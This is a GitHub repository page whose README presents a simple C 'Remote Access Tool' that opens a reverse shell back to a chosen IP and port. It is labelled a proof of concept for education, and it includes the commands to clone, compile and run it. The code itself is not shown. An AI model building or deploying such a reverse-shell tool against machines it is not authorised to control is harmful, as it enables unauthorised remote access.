Skip to content

vladisl0th/RAT

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
 
 
 
 
 
 

Repository files navigation

RAT

This is a proof of concept Remote Access Tool. For educational purposes ONLY!

Description

There should be a listner waiting on the client side for this tool to work.

This is a very simple tool, that can create a reverse shell connection to a server when provided with PORT and IP address of a client to connect back to.

Installation

git and gcc should be installed beforehand.

git clone https://github.com/vladisl0th/RAT.git
cd RAT
gcc rat.c -o rat

Usage

./rat [IP] [PORT]

About

This is a proof of concept R.A.T.

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages